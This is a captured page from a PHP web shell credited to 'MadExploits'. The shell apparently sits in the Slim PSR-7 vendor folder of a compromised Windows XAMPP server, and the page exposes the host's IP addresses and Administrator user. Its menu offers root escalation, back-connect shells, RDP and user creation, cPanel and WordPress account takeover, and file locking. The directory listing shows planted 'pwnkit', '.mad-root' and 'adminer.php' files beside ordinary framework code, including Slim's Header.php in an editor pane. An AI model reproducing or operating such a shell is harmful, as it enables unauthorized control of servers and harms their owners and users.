Windows NT IZOXMIX7871CBCZ 6.3 build 9600 (Windows Server 2012 R2 Datacenter Edition) AMD64
Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
: 172.23.17.241 | : 216.73.216.139
Cant Read [ /etc/named.conf ]
8.2.12
Administrator
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
[ C ]
C: /
xampp /
phpMyAdmin /
vendor /
slim /
psr7 /
src /
[ HOME SHELL ]
Name
Size
Permission
Action
Factory
[ DIR ]
drwxrwxrwx
Interfaces
[ DIR ]
drwxrwxrwx
.mad-root
0
B
-rw-rw-rw-
Cookies.php
5.27
KB
-rw-rw-rw-
Environment.php
1.51
KB
-rw-rw-rw-
Header.php
1.9
KB
-rw-rw-rw-
Headers.php
8.68
KB
-rw-rw-rw-
Message.php
3.8
KB
-rw-rw-rw-
NonBufferedBody.php
2.45
KB
-rw-rw-rw-
Request.php
8.38
KB
-rw-rw-rw-
Response.php
8.5
KB
-rw-rw-rw-
Stream.php
8.98
KB
-rw-rw-rw-
UploadedFile.php
8.34
KB
-rw-rw-rw-
Uri.php
11.22
KB
-rw-rw-rw-
adminer.php
465.43
KB
-rw-rw-rw-
pwnkit
10.99
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Header.php
<?php /** * Slim Framework (https://slimframework.com) * * @license https://github.com/slimphp/Slim-Psr7/blob/master/LICENSE.md (MIT License) */ declare(strict_types=1); namespace Slim\Psr7; use InvalidArgumentException; use function array_merge; use function is_array; use function is_string; class Header { /** * @var string */ private $originalName; /** * @var string */ private $normalizedName; /** * @var array */ private $values; /** * Header constructor. * * @param string $originalName * @param string $normalizedName * @param array $values */ public function __construct(string $originalName, string $normalizedName, array $values) { $this->originalName = $originalName; $this->normalizedName = $normalizedName; $this->values = $values; } /** * @return string */ public function getOriginalName(): string { return $this->originalName; } /** * @return string */ public function getNormalizedName(): string { return $this->normalizedName; } /** * @param string $value * * @return self */ public function addValue(string $value): self { $this->values[] = $value; return $this; } /** * @param array|string $values * * @return self */ public function addValues($values): self { if (is_string($values)) { return $this->addValue($values); } if (!is_array($values)) { throw new InvalidArgumentException('Parameter 1 of Header::addValues() should be a string or an array.'); } $this->values = array_merge($this->values, $values); return $this; } /** * @return array */ public function getValues(): array { return $this->values; } }
Close